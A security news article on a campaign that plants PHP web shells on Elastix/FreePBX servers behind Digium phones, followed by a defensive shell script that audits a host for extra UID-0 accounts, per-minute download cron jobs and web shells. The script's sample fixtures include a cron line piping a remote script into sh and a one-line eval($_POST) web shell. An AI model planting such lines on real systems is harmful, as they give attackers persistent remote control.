Digium VoIP phones are being targeted in an attack campaign that drops a web shell on the Elastix servers behind them and then downloads and executes additional payloads to steal sensitive data.
The malware also fetches fresh payloads for execution and schedules recurring tasks to re-infect the host, according to a report Palo Alto Networks Unit 42 published on Friday.
The unusual activity, which began in mid-December 2021, targets Asterisk, a widely used open-source implementation of a private branch exchange (PBX) that underpins the Elastix Unified Communications Server.
The intrusions also resemble a campaign dubbed INJ3CTOR3 that Israeli cybersecurity firm Check Point disclosed in November 2020, suggesting they could be a "resurgence" of those earlier attacks.
The surge coincided with the public disclosure in December 2021 of a now-patched remote code execution flaw in FreePBX, a web-based open-source GUI for controlling and managing Asterisk. The vulnerability, tracked as CVE-2021-45461, carries a CVSS severity score of 9.8 out of 10.
The attacks begin with the retrieval of a dropper shell script from a remote server; the script installs the PHP web shell in several locations in the file system and creates two root user accounts to maintain remote access.
The dropper also creates a scheduled task that runs every minute and fetches a fresh copy of the shell script from an attacker-controlled domain, so deleting the on-disk copy alone does not clean the host.
The web shell can run arbitrary commands, giving the attackers a foothold on the system from which to steal data while keeping a backdoor into the compromised hosts.
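As an added example that is not from the Unit 42 report or from Digium or Elastix, the POSIX shell script below shows how an administrator of a Linux PBX host could check for the three persistence artifacts described above: extra UID-0 accounts, a per-minute cron job that pulls a remote script, and PHP files that hand request parameters to a code-execution call. The sample passwd, crontab and web-root contents (the account name "sysadm", the example.invalid URL and the two PHP files) are constructed so the script runs offline; on a real host the functions would be pointed at /etc/passwd, the crontabs and the web root instead.

```shell
#!/bin/sh
# Added audit example, not code from the Unit 42 report or from Digium/Elastix.
# It checks a Linux PBX host for three persistence artifacts: extra UID-0
# accounts, a "* * * * *" cron job that downloads something, and PHP files that
# pass request input straight into eval()/system() and friends.
# Sample /etc/passwd, crontab and web-root contents are constructed below so
# the script runs offline; point the functions at the live files on a real host.
set -u

# Every account with UID 0 other than "root"; the dropper adds two such users.
find_extra_uid0() {            # $1 = passwd file
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Cron lines scheduled every minute whose command fetches something with curl/wget.
find_minute_fetchers() {       # $1 = crontab file
    grep -E '^[[:space:]]*\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+.*(curl|wget)' "$1" || true
}

# PHP files that feed a request parameter directly to a code-execution primitive.
find_php_shells() {            # $1 = directory to scan recursively
    grep -rlE '(eval|system|shell_exec|passthru|assert)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)' "$1" 2>/dev/null || true
}

# Total number of findings across the three checks, printed as one integer.
count_findings() {             # $1 = passwd, $2 = crontab, $3 = web root
    {
        find_extra_uid0 "$1"
        find_minute_fetchers "$2"
        find_php_shells "$3"
    } | awk 'END { print NR }'
}

# Constructed sample data: hypothetical account, reserved .invalid domain.
make_samples() {               # $1 = directory to populate
    mkdir -p "$1/html/admin"
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
asterisk:x:498:498::/var/lib/asterisk:/sbin/nologin
sysadm:x:0:0::/root:/bin/bash
EOF
    cat > "$1/crontab" <<'EOF'
0 2 * * * /usr/local/bin/backup.sh
* * * * * curl -s http://example.invalid/s.sh | sh
EOF
    printf '<?php echo "PBX admin"; ?>\n'    > "$1/html/admin/index.php"
    printf '<?php eval($_POST["cmd"]); ?>\n' > "$1/html/admin/config.php"
}

WORK=$(mktemp -d)
make_samples "$WORK"
echo "UID-0 accounts besides root:";  find_extra_uid0 "$WORK/passwd"
echo "Per-minute download cron jobs:"; find_minute_fetchers "$WORK/crontab"
echo "Suspicious PHP files:";          find_php_shells "$WORK/html"
echo "Total findings: $(count_findings "$WORK/passwd" "$WORK/crontab" "$WORK/html")"
rm -rf "$WORK"
```

The three checks are deliberately narrow: they flag the specific shapes the article describes (a second UID-0 user, a once-a-minute re-fetch, request input reaching eval()), so they produce few false positives on a stock PBX but will not catch a web shell that obfuscates its execution call or a cron job that runs on a different schedule. A finding from any one of them on an Elastix host is reason to pull the box offline and image it rather than just delete the file, because the cron job re-downloads the dropper.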
A "common approach malware authors take to launch exploits or run commands remotely" is "the strategy of implanting web shells in vulnerable servers," the researchers said, adding that it's "not a new tactic for malicious actors."